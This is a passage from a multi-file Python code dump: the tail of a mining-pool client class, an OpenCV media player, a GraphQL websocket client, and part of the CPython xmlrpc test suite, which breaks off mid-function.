'id':1
}
#print('Submitting hash: {}'.format(hex_hash))
self.s.sendall(str(json.dumps(submit)+'\n').encode('utf-8'))
select.select([self.s], [], [], 3)
if not self.q.empty():
break
nonce += 1
def stop(self):
self.s.close()
self.terminate()
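# Usage sketch (hypothetical pool endpoint and wallet address); Miner is a
# multiprocessing.Process, so start() runs run() in a child process:
#
#     miner = Miner('pool.example.com', 3333, 'WALLET_ADDRESS')
#     miner.start()
#     ...
#     miner.stop()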
|
media.py | import re
import time
import queue
import threading
import cv2
import numpy as np
__all__ = [ "MediaPlayer", "MediaType" ]
class MediaType:
"""Helper class for referring meida type"""
VIDEO = 1
STREAM = 2
class MediaPlayer:
"""General media player
Arguments:
src (str or int): opencv video source
        queue_size (int, optional): size of frame buffering queue, default 1
"""
STATE_START = 1
STATE_PAUSE = 2
STATE_STOP = 3
    def __init__(self, src, queue_size=1):
        # Opencv capture
        # =====================================================
        src = str(src)  # accept int camera indices as well as strings
        self.capture = cv2.VideoCapture(src if not src.isdecimal() else int(src))
self.capture_lock = threading.Lock()
if not self.capture.isOpened():
raise RuntimeError("Cannot open camera source '{}'".format(src))
# Player metadata
# =====================================================
        self.src = src
self.queue_size = queue_size
# Check source type
if src.startswith("http") or src.startswith("rtsp") or src.isdecimal():
self.stype = MediaType.STREAM
self.frame_queue = queue.Queue(maxsize=1)
else:
self.stype = MediaType.VIDEO
self.frame_queue = queue.Queue(maxsize=queue_size)
self.fps = int(self.capture.get(cv2.CAP_PROP_FPS))
self.total_frames = int(self.capture.get(cv2.CAP_PROP_FRAME_COUNT))
self.height = int(self.capture.get(cv2.CAP_PROP_FRAME_HEIGHT))
self.width = int(self.capture.get(cv2.CAP_PROP_FRAME_WIDTH))
# Player state
# =====================================================
self.state = MediaPlayer.STATE_PAUSE
self.prev_frame = np.zeros((1, 1, 3))
self.curr_frame = np.zeros((1, 1, 3))
self.fid = -1
# Buffering thread
# =====================================================
self._thread = threading.Thread(target=self._buffering, daemon=True)
self._thread.start()
def start(self):
self.state = MediaPlayer.STATE_START
return self
def pause(self):
self.state = MediaPlayer.STATE_PAUSE
return self
def stop(self):
self.state = MediaPlayer.STATE_STOP
# Critical sections
with self.capture_lock:
self.capture.release()
with self.frame_queue.mutex:
self.frame_queue.queue.clear()
return self
def jump(self, index):
"""Move frame pointer to specified point (index)"""
if self.state == MediaPlayer.STATE_PAUSE:
self.fid = index
# Move frame pointer & Critical section
with self.capture_lock:
self.capture.set(cv2.CAP_PROP_POS_FRAMES, index)
_, frame = self.capture.read()
if frame is not None:
self.prev_frame = frame
# For previewing jumped frame
with self.frame_queue.mutex:
self.frame_queue.queue.clear()
self.frame_queue.queue.append(frame)
def read(self):
"""Return next processing frame"""
# Read next frame from frame queue
if self.state == MediaPlayer.STATE_START:
self.fid += 1
self.prev_frame = self.curr_frame
            try:
                self.curr_frame = self.frame_queue.get_nowait()
            except queue.Empty:
                self.curr_frame = self.prev_frame
ret_frame = self.curr_frame.copy()
elif self.state == MediaPlayer.STATE_PAUSE:
ret_frame = self.prev_frame.copy()
else:
raise RuntimeError("You cannot fetch frame from terminated player")
return self.fid, ret_frame
def _buffering(self):
"""Buffering video frames into frame queue"""
while self.state != MediaPlayer.STATE_STOP:
# Fetch new frame and buffer it
if not self.frame_queue.full():
# Critical section
with self.capture_lock:
ret, frame = self.capture.read()
if not ret:
continue
self.frame_queue.put(frame)
# Slow down buffering task
else:
time.sleep(0.01)
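# Usage sketch (assumes a local webcam at index 0; any cv2.VideoCapture
# source string works the same way):
#
#     player = MediaPlayer("0").start()
#     while True:
#         fid, frame = player.read()
#         cv2.imshow("preview", frame)
#         if cv2.waitKey(1) & 0xFF == ord('q'):
#             break
#     player.stop()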
|
client_graphql_ws.py |
import json
import logging
import asyncio
import threading
from .w_socket import WSocket
from .util import Util
from .store import Store
import nest_asyncio
nest_asyncio.apply()
class ClientGraphqlWs:
"""
"""
def __init__(self,
uri,
store,
update,
update_max_len=100,
debug=False):
"""
"""
self.store = store
self.update = update
self.debug = debug
self.update_max_len = update_max_len
self.ws = WSocket(uri, debug)
self.sub_ref = {}
        logging_level = logging.DEBUG if debug else logging.WARNING
logger = logging.getLogger('asyncio')
logger.setLevel(logging_level)
logger.addHandler(logging.StreamHandler())
def _log(self, name, obj=None):
"""
"""
if self.debug:
print('-'*20, name)
if obj:
print(obj)
print('-'*20)
def request(self,
query,
variables=None,
headers=None):
"""
query or mutation
"""
        self.loop = asyncio.get_event_loop()
coro = self._request(query, variables, headers)
task = self.loop.create_task(coro)
res = self.loop.run_until_complete(task)
# res = self.loop.run_until_complete(asyncio.gather(*[task]))
self._log('res', res)
        try:
            return json.loads(res)['payload']['data']
        except (ValueError, KeyError, TypeError):
            return {'raw': res}
def subscribe(self,
query,
variables=None,
subscription_name='',
action=None,
test=lambda x: True,
headers=None):
"""
"""
self.loop = asyncio.new_event_loop()
coro = self._subscribe(query, variables, subscription_name, headers, action, test)
task = self.loop.create_task(coro)
ref = self.loop.run_until_complete(task)
return ref
def subscribe_stop(self, ref):
"""
"""
self.loop = asyncio.new_event_loop()
coro = self._subscribe_stop(ref)
task = self.loop.create_task(coro)
self.loop.run_until_complete(task)
async def _conn_init(self, ws, headers=None):
"""
"""
payload = {'headers': headers} if headers else {}
data = {'type': 'connection_init', 'payload': payload}
self._log('data', data)
await ws.send(json.dumps(data))
res = await ws.receive()
self._log('res', res)
async def _start(self, ws, payload):
"""
"""
_id = Util.random_uuid()
data = {'id': _id, 'type': 'start', 'payload': payload}
self._log('data', data)
await ws.send(json.dumps(data))
return _id
async def _stop(self, ws, _id, await_res=True):
"""
"""
data = {'id': _id, 'type': 'stop'}
self._log('data', data)
await ws.send(json.dumps(data))
if await_res:
res = await ws.receive()
self._log('res', res)
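    # Message flow assumed by the helpers above (graphql-ws /
    # subscriptions-transport-ws protocol; 'connection_ack' and 'data' are
    # the server message types defined by that spec):
    #
    #     client -> {'type': 'connection_init', 'payload': {...}}
    #     server -> {'type': 'connection_ack'}
    #     client -> {'id': i, 'type': 'start', 'payload': {query, variables}}
    #     server -> {'id': i, 'type': 'data' | 'ka' | 'error' | 'complete'}
    #     client -> {'id': i, 'type': 'stop'}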
async def _request(self, query, variables, headers=None):
"""
"""
payload = {'query': query, 'variables': variables}
async with self.ws as ws:
await self._conn_init(ws, headers)
_id = await self._start(ws, payload)
res = await ws.receive()
self._log('res', res)
await self._stop(ws, _id)
return res
def _build_handler(self, channel, subscription_name, action, test):
"""
"""
# if not channel in self.store:
# self.store[channel] = Store(channel, action=action)
# else:
# self.store[channel].action = action
        if channel not in self.store:
self.store[channel] = Store(channel)
def handler(payload):
            try:
                data = payload['data'][subscription_name]
            except (KeyError, TypeError):
                self._log('ERROR', payload)
                return
name = data.get('name')
value = data.get('value')
if action:
action(channel, name, value)
if test(name):
self.store[channel][name] = value
self.update.append((channel, name, value))
                if len(self.update) > self.update_max_len:
                    # trim in place so external references to the list stay valid
                    del self.update[:-self.update_max_len]
self._log(f'\tdone: {channel}\tname:{name}\tvalue:{value}')
return handler
async def _subscribe(self,
query,
variables,
subscription_name,
headers=None,
action=None,
test=lambda x: True
):
"""
"""
payload = {'query': query, 'variables': variables}
channel = variables.get('channel')
_handler = self._build_handler(channel, subscription_name, action, test)
self._log('payload', payload)
self._log('headers', headers)
ref = Util.random_uuid()
async def _run_sub():
async with self.ws as ws:
# self._sub_ws = ws
await self._conn_init(ws, headers)
_id = await self._start(ws, payload)
self.sub_ref[ref] = {'ws': ws, 'id': _id}
self._log('id', _id)
# self._sub_id = _id
while self._subscription_running:
res = await ws.receive()
dic = json.loads(res)
self._log('dic', dic)
# self._log('test id', _id == dic['id'])
                    if dic['type'] in ('error', 'complete'):
self._log('last msg subscription', dic)
self._subscription_running = False
elif dic['type'] != 'ka' and dic['id'] == _id:
_handler(dic['payload'])
self._log('done _run_sub')
def loop_in_thread():
thread_loop = asyncio.new_event_loop()
thread_loop.run_until_complete(_run_sub())
self._subscription_running = True
self._thread = threading.Thread(target=loop_in_thread, args=())
self._thread.start()
return ref
async def _subscribe_stop(self, ref):
"""
"""
dic = self.sub_ref.get(ref)
if dic:
await self._stop(dic.get('ws'),
dic.get('id'),
await_res=False)
self.sub_ref.pop(ref)
print(f'subscription ref={ref} stopped')
else:
print(f'subscribe ref {ref} does not exist')
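# Usage sketch (hypothetical endpoint, query and subscription; store and
# update are the caller-owned containers described in __init__):
#
#     client = ClientGraphqlWs('ws://localhost:8080/graphql',
#                              store={}, update=[])
#     data = client.request('query { __typename }')
#     ref = client.subscribe(
#         'subscription ($channel: String!) {'
#         ' msg(channel: $channel) { name value } }',
#         variables={'channel': 'demo'},
#         subscription_name='msg')
#     client.subscribe_stop(ref)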
|
test_xmlrpc.py | import base64
import datetime
import decimal
import sys
import time
import unittest
from unittest import mock
import xmlrpc.client as xmlrpclib
import xmlrpc.server
import http.client
import http, http.server
import socket
import threading
import re
import io
import contextlib
from test import support
from test.support import socket_helper
from test.support import ALWAYS_EQ, LARGEST, SMALLEST
try:
import gzip
except ImportError:
gzip = None
alist = [{'astring': 'foo@bar.baz.spam',
'afloat': 7283.43,
'anint': 2**20,
'ashortlong': 2,
'anotherlist': ['.zyx.41'],
'abase64': xmlrpclib.Binary(b"my dog has fleas"),
'b64bytes': b"my dog has fleas",
'b64bytearray': bytearray(b"my dog has fleas"),
'boolean': False,
'unicode': '\u4000\u6000\u8000',
'ukey\u4000': 'regular value',
'datetime1': xmlrpclib.DateTime('20050210T11:41:23'),
'datetime2': xmlrpclib.DateTime(
(2005, 2, 10, 11, 41, 23, 0, 1, -1)),
'datetime3': xmlrpclib.DateTime(
datetime.datetime(2005, 2, 10, 11, 41, 23)),
}]
class XMLRPCTestCase(unittest.TestCase):
def test_dump_load(self):
dump = xmlrpclib.dumps((alist,))
load = xmlrpclib.loads(dump)
self.assertEqual(alist, load[0][0])
def test_dump_bare_datetime(self):
# This checks that an unwrapped datetime.date object can be handled
# by the marshalling code. This can't be done via test_dump_load()
# since with use_builtin_types set to 1 the unmarshaller would create
# datetime objects for the 'datetime[123]' keys as well
dt = datetime.datetime(2005, 2, 10, 11, 41, 23)
self.assertEqual(dt, xmlrpclib.DateTime('20050210T11:41:23'))
s = xmlrpclib.dumps((dt,))
result, m = xmlrpclib.loads(s, use_builtin_types=True)
(newdt,) = result
self.assertEqual(newdt, dt)
self.assertIs(type(newdt), datetime.datetime)
self.assertIsNone(m)
result, m = xmlrpclib.loads(s, use_builtin_types=False)
(newdt,) = result
self.assertEqual(newdt, dt)
self.assertIs(type(newdt), xmlrpclib.DateTime)
self.assertIsNone(m)
result, m = xmlrpclib.loads(s, use_datetime=True)
(newdt,) = result
self.assertEqual(newdt, dt)
self.assertIs(type(newdt), datetime.datetime)
self.assertIsNone(m)
result, m = xmlrpclib.loads(s, use_datetime=False)
(newdt,) = result
self.assertEqual(newdt, dt)
self.assertIs(type(newdt), xmlrpclib.DateTime)
self.assertIsNone(m)
def test_datetime_before_1900(self):
# same as before but with a date before 1900
dt = datetime.datetime(1, 2, 10, 11, 41, 23)
self.assertEqual(dt, xmlrpclib.DateTime('00010210T11:41:23'))
s = xmlrpclib.dumps((dt,))
result, m = xmlrpclib.loads(s, use_builtin_types=True)
(newdt,) = result
self.assertEqual(newdt, dt)
self.assertIs(type(newdt), datetime.datetime)
self.assertIsNone(m)
result, m = xmlrpclib.loads(s, use_builtin_types=False)
(newdt,) = result
self.assertEqual(newdt, dt)
self.assertIs(type(newdt), xmlrpclib.DateTime)
self.assertIsNone(m)
def test_bug_1164912 (self):
d = xmlrpclib.DateTime()
((new_d,), dummy) = xmlrpclib.loads(xmlrpclib.dumps((d,),
methodresponse=True))
self.assertIsInstance(new_d.value, str)
# Check that the output of dumps() is still an 8-bit string
s = xmlrpclib.dumps((new_d,), methodresponse=True)
self.assertIsInstance(s, str)
def test_newstyle_class(self):
class T(object):
pass
t = T()
t.x = 100
t.y = "Hello"
((t2,), dummy) = xmlrpclib.loads(xmlrpclib.dumps((t,)))
self.assertEqual(t2, t.__dict__)
def test_dump_big_long(self):
self.assertRaises(OverflowError, xmlrpclib.dumps, (2**99,))
def test_dump_bad_dict(self):
self.assertRaises(TypeError, xmlrpclib.dumps, ({(1,2,3): 1},))
def test_dump_recursive_seq(self):
l = [1,2,3]
t = [3,4,5,l]
l.append(t)
self.assertRaises(TypeError, xmlrpclib.dumps, (l,))
def test_dump_recursive_dict(self):
d = {'1':1, '2':1}
t = {'3':3, 'd':d}
d['t'] = t
self.assertRaises(TypeError, xmlrpclib.dumps, (d,))
def test_dump_big_int(self):
if sys.maxsize > 2**31-1:
self.assertRaises(OverflowError, xmlrpclib.dumps,
(int(2**34),))
xmlrpclib.dumps((xmlrpclib.MAXINT, xmlrpclib.MININT))
self.assertRaises(OverflowError, xmlrpclib.dumps,
(xmlrpclib.MAXINT+1,))
self.assertRaises(OverflowError, xmlrpclib.dumps,
(xmlrpclib.MININT-1,))
def dummy_write(s):
pass
m = xmlrpclib.Marshaller()
m.dump_int(xmlrpclib.MAXINT, dummy_write)
m.dump_int(xmlrpclib.MININT, dummy_write)
self.assertRaises(OverflowError, m.dump_int,
xmlrpclib.MAXINT+1, dummy_write)
self.assertRaises(OverflowError, m.dump_int,
xmlrpclib.MININT-1, dummy_write)
def test_dump_double(self):
xmlrpclib.dumps((float(2 ** 34),))
xmlrpclib.dumps((float(xmlrpclib.MAXINT),
float(xmlrpclib.MININT)))
xmlrpclib.dumps((float(xmlrpclib.MAXINT + 42),
float(xmlrpclib.MININT - 42)))
def dummy_write(s):
pass
m = xmlrpclib.Marshaller()
m.dump_double(xmlrpclib.MAXINT, dummy_write)
m.dump_double(xmlrpclib.MININT, dummy_write)
m.dump_double(xmlrpclib.MAXINT + 42, dummy_write)
m.dump_double(xmlrpclib.MININT - 42, dummy_write)
def test_dump_none(self):
value = alist + [None]
arg1 = (alist + [None],)
strg = xmlrpclib.dumps(arg1, allow_none=True)
self.assertEqual(value,
xmlrpclib.loads(strg)[0][0])
self.assertRaises(TypeError, xmlrpclib.dumps, (arg1,))
def test_dump_encoding(self):
value = {'key\u20ac\xa4':
'value\u20ac\xa4'}
strg = xmlrpclib.dumps((value,), encoding='iso-8859-15')
strg = "<?xml version='1.0' encoding='iso-8859-15'?>" + strg
self.assertEqual(xmlrpclib.loads(strg)[0][0], value)
strg = strg.encode('iso-8859-15', 'xmlcharrefreplace')
self.assertEqual(xmlrpclib.loads(strg)[0][0], value)
strg = xmlrpclib.dumps((value,), encoding='iso-8859-15',
methodresponse=True)
self.assertEqual(xmlrpclib.loads(strg)[0][0], value)
strg = strg.encode('iso-8859-15', 'xmlcharrefreplace')
self.assertEqual(xmlrpclib.loads(strg)[0][0], value)
methodname = 'method\u20ac\xa4'
strg = xmlrpclib.dumps((value,), encoding='iso-8859-15',
methodname=methodname)
self.assertEqual(xmlrpclib.loads(strg)[0][0], value)
self.assertEqual(xmlrpclib.loads(strg)[1], methodname)
def test_dump_bytes(self):
sample = b"my dog has fleas"
self.assertEqual(sample, xmlrpclib.Binary(sample))
for type_ in bytes, bytearray, xmlrpclib.Binary:
value = type_(sample)
s = xmlrpclib.dumps((value,))
result, m = xmlrpclib.loads(s, use_builtin_types=True)
(newvalue,) = result
self.assertEqual(newvalue, sample)
self.assertIs(type(newvalue), bytes)
self.assertIsNone(m)
result, m = xmlrpclib.loads(s, use_builtin_types=False)
(newvalue,) = result
self.assertEqual(newvalue, sample)
self.assertIs(type(newvalue), xmlrpclib.Binary)
self.assertIsNone(m)
def test_loads_unsupported(self):
ResponseError = xmlrpclib.ResponseError
data = '<params><param><value><spam/></value></param></params>'
self.assertRaises(ResponseError, xmlrpclib.loads, data)
data = ('<params><param><value><array>'
'<value><spam/></value>'
'</array></value></param></params>')
self.assertRaises(ResponseError, xmlrpclib.loads, data)
data = ('<params><param><value><struct>'
'<member><name>a</name><value><spam/></value></member>'
'<member><name>b</name><value><spam/></value></member>'
'</struct></value></param></params>')
self.assertRaises(ResponseError, xmlrpclib.loads, data)
def check_loads(self, s, value, **kwargs):
dump = '<params><param><value>%s</value></param></params>' % s
result, m = xmlrpclib.loads(dump, **kwargs)
(newvalue,) = result
self.assertEqual(newvalue, value)
self.assertIs(type(newvalue), type(value))
self.assertIsNone(m)
def test_load_standard_types(self):
check = self.check_loads
check('string', 'string')
check('<string>string</string>', 'string')
check('<string>𝔘𝔫𝔦𝔠𝔬𝔡𝔢 string</string>', '𝔘𝔫𝔦𝔠𝔬𝔡𝔢 string')
check('<int>2056183947</int>', 2056183947)
check('<int>-2056183947</int>', -2056183947)
check('<i4>2056183947</i4>', 2056183947)
check('<double>46093.78125</double>', 46093.78125)
check('<boolean>0</boolean>', False)
check('<base64>AGJ5dGUgc3RyaW5n/w==</base64>',
xmlrpclib.Binary(b'\x00byte string\xff'))
check('<base64>AGJ5dGUgc3RyaW5n/w==</base64>',
b'\x00byte string\xff', use_builtin_types=True)
check('<dateTime.iso8601>20050210T11:41:23</dateTime.iso8601>',
xmlrpclib.DateTime('20050210T11:41:23'))
check('<dateTime.iso8601>20050210T11:41:23</dateTime.iso8601>',
datetime.datetime(2005, 2, 10, 11, 41, 23),
use_builtin_types=True)
check('<array><data>'
'<value><int>1</int></value><value><int>2</int></value>'
'</data></array>', [1, 2])
check('<struct>'
'<member><name>b</name><value><int>2</int></value></member>'
'<member><name>a</name><value><int>1</int></value></member>'
'</struct>', {'a': 1, 'b': 2})
def test_load_extension_types(self):
check = self.check_loads
check('<nil/>', None)
check('<ex:nil/>', None)
check('<i1>205</i1>', 205)
check('<i2>20561</i2>', 20561)
check('<i8>9876543210</i8>', 9876543210)
check('<biginteger>98765432100123456789</biginteger>',
98765432100123456789)
check('<float>93.78125</float>', 93.78125)
check('<bigdecimal>9876543210.0123456789</bigdecimal>',
decimal.Decimal('9876543210.0123456789'))
def test_get_host_info(self):
# see bug #3613, this raised a TypeError
transp = xmlrpc.client.Transport()
self.assertEqual(transp.get_host_info("user@host.tld"),
('host.tld',
[('Authorization', 'Basic dXNlcg==')], {}))
def test_ssl_presence(self):
try:
import ssl
except ImportError:
has_ssl = False
else:
has_ssl = True
try:
xmlrpc.client.ServerProxy('https://localhost:9999').bad_function()
except NotImplementedError:
self.assertFalse(has_ssl, "xmlrpc client's error with SSL support")
except OSError:
self.assertTrue(has_ssl)
def test_keepalive_disconnect(self):
class RequestHandler(http.server.BaseHTTPRequestHandler):
protocol_version = "HTTP/1.1"
handled = False
def do_POST(self):
length = int(self.headers.get("Content-Length"))
self.rfile.read(length)
if self.handled:
self.close_connection = True
return
response = xmlrpclib.dumps((5,), methodresponse=True)
response = response.encode()
self.send_response(http.HTTPStatus.OK)
self.send_header("Content-Length", len(response))
self.end_headers()
self.wfile.write(response)
self.handled = True
self.close_connection = False
def log_message(self, format, *args):
# don't clobber sys.stderr
pass
def run_server():
server.socket.settimeout(float(1)) # Don't hang if client fails
server.handle_request() # First request and attempt at second
server.handle_request() # Retried second request
server = http.server.HTTPServer((socket_helper.HOST, 0), RequestHandler)
self.addCleanup(server.server_close)
thread = threading.Thread(target=run_server)
thread.start()
self.addCleanup(thread.join)
url = "http://{}:{}/".format(*server.server_address)
with xmlrpclib.ServerProxy(url) as p:
self.assertEqual(p.method(), 5)
self.assertEqual(p.method(), 5)
class SimpleXMLRPCDispatcherTestCase(unittest.TestCase):
class DispatchExc(Exception):
"""Raised inside the dispatched functions when checking for
chained exceptions"""
def test_call_registered_func(self):
"""Calls explicitly registered function"""
# Makes sure any exception raised inside the function has no other
# exception chained to it
exp_params = 1, 2, 3
def dispatched_func(*params):
raise self.DispatchExc(params)
dispatcher = xmlrpc.server.SimpleXMLRPCDispatcher()
dispatcher.register_function(dispatched_func)
with self.assertRaises(self.DispatchExc) as exc_ctx:
dispatcher._dispatch('dispatched_func', exp_params)
self.assertEqual(exc_ctx.exception.args, (exp_params,))
self.assertIsNone(exc_ctx.exception.__cause__)
self.assertIsNone(exc_ctx.exception.__context__)
def test_call_instance_func(self):
"""Calls a registered instance attribute as a function"""
# Makes sure any exception raised inside the function has no other
# exception chained to it
exp_params = 1, 2, 3
class DispatchedClass:
def dispatched_func(self, *params):
raise SimpleXMLRPCDispatcherTestCase.DispatchExc(params)
dispatcher = xmlrpc.server.SimpleXMLRPCDispatcher()
dispatcher.register_instance(DispatchedClass())
with self.assertRaises(self.DispatchExc) as exc_ctx:
dispatcher._dispatch('dispatched_func', exp_params)
self.assertEqual(exc_ctx.exception.args, (exp_params,))
self.assertIsNone(exc_ctx.exception.__cause__)
self.assertIsNone(exc_ctx.exception.__context__)
def test_call_dispatch_func(self):
"""Calls the registered instance's `_dispatch` function"""
# Makes sure any exception raised inside the function has no other
# exception chained to it
exp_method = 'method'
exp_params = 1, 2, 3
class TestInstance:
def _dispatch(self, method, params):
raise SimpleXMLRPCDispatcherTestCase.DispatchExc(
method, params)
dispatcher = xmlrpc.server.SimpleXMLRPCDispatcher()
dispatcher.register_instance(TestInstance())
with self.assertRaises(self.DispatchExc) as exc_ctx:
dispatcher._dispatch(exp_method, exp_params)
self.assertEqual(exc_ctx.exception.args, (exp_method, exp_params))
self.assertIsNone(exc_ctx.exception.__cause__)
self.assertIsNone(exc_ctx.exception.__context__)
def test_registered_func_is_none(self):
"""Calls explicitly registered function which is None"""
dispatcher = xmlrpc.server.SimpleXMLRPCDispatcher()
dispatcher.register_function(None, name='method')
with self.assertRaisesRegex(Exception, 'method'):
dispatcher._dispatch('method', ('param',))
def test_instance_has_no_func(self):
"""Attempts to call nonexistent function on a registered instance"""
dispatcher = xmlrpc.server.SimpleXMLRPCDispatcher()
dispatcher.register_instance(object())
with self.assertRaisesRegex(Exception, 'method'):
dispatcher._dispatch('method', ('param',))
def test_cannot_locate_func(self):
"""Calls a function that the dispatcher cannot locate"""
dispatcher = xmlrpc.server.SimpleXMLRPCDispatcher()
with self.assertRaisesRegex(Exception, 'method'):
dispatcher._dispatch('method', ('param',))
class HelperTestCase(unittest.TestCase):
def test_escape(self):
self.assertEqual(xmlrpclib.escape("a&b"), "a&b")
self.assertEqual(xmlrpclib.escape("a<b"), "a<b")
self.assertEqual(xmlrpclib.escape("a>b"), "a>b")
class FaultTestCase(unittest.TestCase):
def test_repr(self):
f = xmlrpclib.Fault(42, 'Test Fault')
self.assertEqual(repr(f), "<Fault 42: 'Test Fault'>")
self.assertEqual(repr(f), str(f))
def test_dump_fault(self):
f = xmlrpclib.Fault(42, 'Test Fault')
s = xmlrpclib.dumps((f,))
(newf,), m = xmlrpclib.loads(s)
self.assertEqual(newf, {'faultCode': 42, 'faultString': 'Test Fault'})
self.assertEqual(m, None)
s = xmlrpclib.Marshaller().dumps(f)
self.assertRaises(xmlrpclib.Fault, xmlrpclib.loads, s)
def test_dotted_attribute(self):
        # this will raise AttributeError because the code doesn't want us to
        # use private methods
self.assertRaises(AttributeError,
xmlrpc.server.resolve_dotted_attribute, str, '__add')
self.assertTrue(xmlrpc.server.resolve_dotted_attribute(str, 'title'))
class DateTimeTestCase(unittest.TestCase):
def test_default(self):
with mock.patch('time.localtime') as localtime_mock:
time_struct = time.struct_time(
[2013, 7, 15, 0, 24, 49, 0, 196, 0])
localtime_mock.return_value = time_struct
localtime = time.localtime()
t = xmlrpclib.DateTime()
self.assertEqual(str(t),
time.strftime("%Y%m%dT%H:%M:%S", localtime))
def test_time(self):
d = 1181399930.036952
t = xmlrpclib.DateTime(d)
self.assertEqual(str(t),
time.strftime("%Y%m%dT%H:%M:%S", time.localtime(d)))
def test_time_tuple(self):
d = (2007,6,9,10,38,50,5,160,0)
t = xmlrpclib.DateTime(d)
self.assertEqual(str(t), '20070609T10:38:50')
def test_time_struct(self):
d = time.localtime(1181399930.036952)
t = xmlrpclib.DateTime(d)
self.assertEqual(str(t), time.strftime("%Y%m%dT%H:%M:%S", d))
def test_datetime_datetime(self):
d = datetime.datetime(2007,1,2,3,4,5)
t = xmlrpclib.DateTime(d)
self.assertEqual(str(t), '20070102T03:04:05')
def test_repr(self):
d = datetime.datetime(2007,1,2,3,4,5)
t = xmlrpclib.DateTime(d)
val ="<DateTime '20070102T03:04:05' at %#x>" % id(t)
self.assertEqual(repr(t), val)
def test_decode(self):
d = ' 20070908T07:11:13 '
t1 = xmlrpclib.DateTime()
t1.decode(d)
tref = xmlrpclib.DateTime(datetime.datetime(2007,9,8,7,11,13))
self.assertEqual(t1, tref)
t2 = xmlrpclib._datetime(d)
self.assertEqual(t2, tref)
def test_comparison(self):
now = datetime.datetime.now()
dtime = xmlrpclib.DateTime(now.timetuple())
# datetime vs. DateTime
self.assertTrue(dtime == now)
self.assertTrue(now == dtime)
then = now + datetime.timedelta(seconds=4)
self.assertTrue(then >= dtime)
self.assertTrue(dtime < then)
# str vs. DateTime
dstr = now.strftime("%Y%m%dT%H:%M:%S")
self.assertTrue(dtime == dstr)
self.assertTrue(dstr == dtime)
dtime_then = xmlrpclib.DateTime(then.timetuple())
self.assertTrue(dtime_then >= dstr)
self.assertTrue(dstr < dtime_then)
# some other types
dbytes = dstr.encode('ascii')
dtuple = now.timetuple()
self.assertFalse(dtime == 1970)
self.assertTrue(dtime != dbytes)
self.assertFalse(dtime == bytearray(dbytes))
self.assertTrue(dtime != dtuple)
with self.assertRaises(TypeError):
dtime < float(1970)
with self.assertRaises(TypeError):
dtime > dbytes
with self.assertRaises(TypeError):
dtime <= bytearray(dbytes)
with self.assertRaises(TypeError):
dtime >= dtuple
self.assertTrue(dtime == ALWAYS_EQ)
self.assertFalse(dtime != ALWAYS_EQ)
self.assertTrue(dtime < LARGEST)
self.assertFalse(dtime > LARGEST)
self.assertTrue(dtime <= LARGEST)
self.assertFalse(dtime >= LARGEST)
self.assertFalse(dtime < SMALLEST)
self.assertTrue(dtime > SMALLEST)
self.assertFalse(dtime <= SMALLEST)
self.assertTrue(dtime >= SMALLEST)
class BinaryTestCase(unittest.TestCase):
    # XXX What should str(Binary(b"\xff")) return? I'm choosing "\xff"
# for now (i.e. interpreting the binary data as Latin-1-encoded
# text). But this feels very unsatisfactory. Perhaps we should
# only define repr(), and return r"Binary(b'\xff')" instead?
def test_default(self):
t = xmlrpclib.Binary()
self.assertEqual(str(t), '')
def test_string(self):
d = b'\x01\x02\x03abc123\xff\xfe'
t = xmlrpclib.Binary(d)
self.assertEqual(str(t), str(d, "latin-1"))
def test_decode(self):
d = b'\x01\x02\x03abc123\xff\xfe'
de = base64.encodebytes(d)
t1 = xmlrpclib.Binary()
t1.decode(de)
self.assertEqual(str(t1), str(d, "latin-1"))
t2 = xmlrpclib._binary(de)
self.assertEqual(str(t2), str(d, "latin-1"))
ADDR = PORT = URL = None
# The evt is set twice. First when the server is ready to serve.
# Second when the server has been shutdown. The user must clear
# the event after it has been set the first time to catch the second set.
def http_server(evt, numrequests, requestHandler=None, encoding=None):
class TestInstanceClass:
def div(self, x, y):
return x // y
def _methodHelp(self, name):
if name == 'div':
return 'This is the div function'
class Fixture:
@staticmethod
def getData():
return '42'
class MyXMLRPCServer(xmlrpc.server.SimpleXMLRPCServer):
def get_request(self):
# Ensure the socket is always non-blocking. On Linux, socket
# attributes are not inherited like they are on *BSD and Windows.
s, port = self.socket.accept()
s.setblocking(True)
return s, port
if not requestHandler:
requestHandler = xmlrpc.server.SimpleXMLRPCRequestHandler
serv = MyXMLRPCServer(("localhost", 0), requestHandler,
encoding=encoding,
logRequests=False, bind_and_activate=False)
try:
serv.server_bind()
global ADDR, PORT, URL
ADDR, PORT = serv.socket.getsockname()
#connect to IP address directly. This avoids socket.create_connection()
#trying to connect to "localhost" using all address families, which
#causes slowdown e.g. on vista which supports AF_INET6. The server listens
#on AF_INET only.
URL = "http://%s:%d"%(ADDR, PORT)
serv.server_activate()
serv.register_introspection_functions()
serv.register_multicall_functions()
serv.register_function(pow)
serv.register_function(lambda x: x, 'têšt')
@serv.register_function
def my_function():
'''This is my function'''
return True
@serv.register_function(name='add')
def _(x, y):
return x + y
testInstance = TestInstanceClass()
serv.register_instance(testInstance, allow_dotted_names=True)
evt.set()
# handle up to 'numrequests' requests
while numrequests > 0:
serv.handle_request()
numrequests -= 1
except socket.timeout:
pass
finally:
serv.socket.close()
PORT = None
evt.set()
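# A minimal sketch of the two-phase event handshake implemented above
# (numrequests=1; this mirrors what the test setUp/tearDown methods below do):
#
#     evt = threading.Event()
#     threading.Thread(target=http_server, args=(evt, 1)).start()
#     evt.wait(); evt.clear()   # first set: server is ready
#     xmlrpclib.ServerProxy(URL).my_function()
#     evt.wait()                # second set: server has shut down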
def http_multi_server(evt, numrequests, requestHandler=None):
class TestInstanceClass:
def div(self, x, y):
return x // y
def _methodHelp(self, name):
if name == 'div':
return 'This is the div function'
def my_function():
'''This is my function'''
return True
class MyXMLRPCServer(xmlrpc.server.MultiPathXMLRPCServer):
def get_request(self):
# Ensure the socket is always non-blocking. On Linux, socket
# attributes are not inherited like they are on *BSD and Windows.
s, port = self.socket.accept()
s.setblocking(True)
return s, port
if not requestHandler:
requestHandler = xmlrpc.server.SimpleXMLRPCRequestHandler
class MyRequestHandler(requestHandler):
rpc_paths = []
class BrokenDispatcher:
def _marshaled_dispatch(self, data, dispatch_method=None, path=None):
raise RuntimeError("broken dispatcher")
serv = MyXMLRPCServer(("localhost", 0), MyRequestHandler,
logRequests=False, bind_and_activate=False)
serv.socket.settimeout(3)
serv.server_bind()
try:
global ADDR, PORT, URL
ADDR, PORT = serv.socket.getsockname()
#connect to IP address directly. This avoids socket.create_connection()
#trying to connect to "localhost" using all address families, which
#causes slowdown e.g. on vista which supports AF_INET6. The server listens
#on AF_INET only.
URL = "http://%s:%d"%(ADDR, PORT)
serv.server_activate()
paths = ["/foo", "/foo/bar"]
for path in paths:
